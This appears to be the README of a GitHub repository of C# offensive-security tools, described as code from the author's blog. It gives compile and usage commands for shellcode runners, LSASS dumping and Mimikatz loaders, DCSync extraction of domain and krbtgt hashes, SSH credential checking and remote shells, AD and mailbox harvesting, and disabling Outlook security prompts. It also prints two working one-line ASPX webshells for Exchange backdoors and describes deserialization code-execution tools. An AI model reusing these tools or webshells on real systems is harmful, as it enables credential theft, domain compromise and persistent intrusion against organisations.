Homework-of-C-Sharp

C Sharp codes of my blog.


Shellcode.cs

Use CreateThread to run shellcode.

ShellcodeBase64.txt

Base64 of the shellcode (msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp).

ReadShellcode.cs

It will read ShellcodeBase64.txt and launch the shellcode.


DumpLsass.cs

Source code is https://github.com/GhostPack/SafetyKatz

Some functions of the source code were removed; it is only used to dump lsass.exe to the current path.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs

SafetyKatz.cs

Used to run sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file of lsass.exe.

All code from https://github.com/GhostPack/SafetyKatz

I just modified a few lines of code so that it can be compiled by csc.exe.

Eg.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe


GzipandBase64.cs

Used to generate the KatzCompressed string in PELoaderofMimikatz.cs.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs

PELoaderofMimikatz.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supports 4.0 or later.

This code supports 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs

DcsyncofMimikatz.cs

This is the dcsync mode extracted from Mimikatz.

The source code in KatzCompressed is https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip

You can use https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string.

The source code supports 4.0 or later.

This code supports 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs

Usage:

DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit

DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit


SharpMimikatz_x86.cs

Reference:Casey Smith's PELoader.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supports 4.0 or later.

This code supports 3.5 or later.

This is a 32-bit version.

Compile:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs

or

C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs

Usage:

SharpMimikatz_x86.exe coffee exit

SharpMimikatz_x64.cs

Reference:Casey Smith's PELoader.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supports 4.0 or later.

This code supports 3.5 or later.

This is a 64-bit version.

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs

Usage:

SharpMimikatz_x64.exe coffee exit

SharpPELoaderGenerater.cs

Used to generate SharpPELoader.cs.

Modified by 3gstudent

Reference:Casey Smith's PELoader.cs

Usage:

SharpPELoaderGenerater.exe <exe path>

Eg.

SharpPELoaderGenerater.exe mimikatz.exe

SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code.

More details:

"Loading PE files into memory with .NET" (《通过.NET实现内存加载PE文件》)


AddMachineAccountofDomain.cs

Reference:https://github.com/pkb1s/SharpAllowedToAct

This code is just part of SharpAllowedToAct.

It can be used to add a Machine Account (User: testNew, Password: 123456789).

This code can be compiled by csc.exe or Visual Studio.

Supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll


mapi_tool.cs

Use MAPI to manage Outlook.

This code can be compiled by csc.exe or Visual Studio.

Supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll

Usage:
     mapi_tool.exe GetAllFolders
     mapi_tool.exe GetConfig
     mapi_tool.exe ListMail <folder>
     mapi_tool.exe ListUnreadMail <folder>
Ex command:
     mapi_tool.exe GetConfigEx
     mapi_tool.exe GetContactsEx
     mapi_tool.exe GetGlobalAddressEx  
     mapi_tool.exe ListMailEx <folder>
     mapi_tool.exe ListUnreadMailEx <folder>
     mapi_tool.exe SaveAttachment <folder> <EntryID>  
     <folder>:Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail
Note:
     When the antivirus software is inactive or out-of-date, running an Ex command will pop up an Outlook security prompt.
     You can modify the registry to turn off the Outlook security prompt.
     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2

Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll

Use for Outlook 2010.

Office15-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll

Use for Outlook 2013.


BrailleToASCII.cs

Used to translate Braille Patterns to ASCII characters.

Support:1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$

This code can be compiled by csc.exe or Visual Studio.

Supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs


SSLCertScan

Used to scan a website's SSL certificate.

Reference:https://github.com/ryanries/SharpTLSScan

This code can be compiled by csc.exe or Visual Studio.

Supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs

SharpSSHCheck_SSH.NET.cs

Used to check for valid SSH credentials (based on SSH.NET).

Supports password and private key file.

Reference:https://github.com/sshnet/SSH.NET

Note:

You need to reference Renci.SshNet.dll.

You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll

Usage:

      SharpSSHCheck_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password>
      <mode>:
      - plaintext
      - keyfile

Eg:

      SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor
      SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa

SharpSSHRunCmd_SSH.NET

Remote command execution via SSH (based on SSH.NET).

Supports password and private key file.

Reference:https://github.com/sshnet/SSH.NET

Note:

You need to reference Renci.SshNet.dll.

You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip

Compile:

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll

Usage:

      SharpSSHRunCmd_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password> <cmd>
      <mode>:
      - plaintext
      - keyfile
If the <cmd> is shell, you will get an interactive shell.

Eg:

      SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell
      SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps

ListUserMailbyLDAP

Used to export all users' mail by LDAP.

Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs

Compile:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll

Usage:

      ListUserMailbyLDAP <LDAP ServerIP> <user> <password>

Eg:

      ListUserMailbyLDAP.exe 192.168.1.1 test1 password1

List_passwordneverexpires_user_byLDAP

Used to export all users with password_never_expires by LDAP.

Compile:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll

Usage:

      List_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password>

Eg:

      List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1

Add_passwordneverexpires_user_byLDAP

Used to set the selected user with password_never_expires by LDAP.

Compile:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll

Usage:

      Add_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password> <target user> 

Eg:

      Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1

SqlClient.cs

From:https://github.com/FortyNorthSecurity/SqlClient

Used to query the MSSQL database.

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs

SharpADFindDemo.cs

Used to export the AD data by LDAP.

Compile:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll

Usage:

      SharpADFindDemo <LDAP ServerIP> <user> <password> <command>
            
command:
- user
- machine
- group
- ou
- username
- machinename
- groupname
- ouname

Note: The maxsize is 1000.

Eg:

      SharpADFindDemo.exe 192.168.1.1 test1 password1 user

SharpExchangeBackdoor.cs

Python Version: SharpExchangeBackdoor.py

Used to send a payload to the Exchange webshell backdoor.

Support:

  • assemblyLoad
  • webshellWrite

Usage:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

eg.

    SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

XamlToViewState.cs

Used to create a viewstate from a XAML file.

Usage:

    <xaml path> <generator> <key>

eg.

XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF

SerializeXamlToViewState.cs

Used to create a viewstate from serialized XAML data.

SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs

SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs

SharpExchangeDeserializeShell-NoAuth-ghostfile.cs

Code from https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs

Used to test the deserializing code execution of Exchange.

From read and write permissions of Exchange files to deserializing code execution.

You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy<path>\web.config to implement deserializing code execution.

<path>: owa or ecp

Usage:

    <url> <key> <path>

eg.

    192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
    mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

SharpExchangeDumpHash.cs

Used to send a payload to the Exchange webshell backdoor. The communication is encrypted by AES.

Support function:

  • generate : generate the webshell
  • dumplsass: save the dump file of LSASS to C:\Windows\Temp\lsass.bin
  • parsedump: use mimikatz to load C:\Windows\Temp\lsass.bin and save the results to C:\Windows\Temp\mimikatz.log

Usage:

    <url> <user> <password> <mode>

mode:

  • generate
  • dumplsass
  • parsedump

eg.

    SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass
    SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump

SharpDCSync_krbtgt.cs

Uses the DRSR protocol to ask a domain controller to get the krbtgt's hash.

Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin

SharpDCSync.cs

Uses the DRSR protocol to ask a domain controller to synchronize a specified entry.

Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin


SharpTGTImporter.cs

Used to import the TGT.

Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin


SharpGetUserLoginIPRPC.cs

Uses RPC to get the login IP of domain users through the event log.

Supports local and remote access.

SharpGetUserLoginIPWMI.cs

Uses WMI to get the login IP of domain users through the event log.

Supports local and remote access.

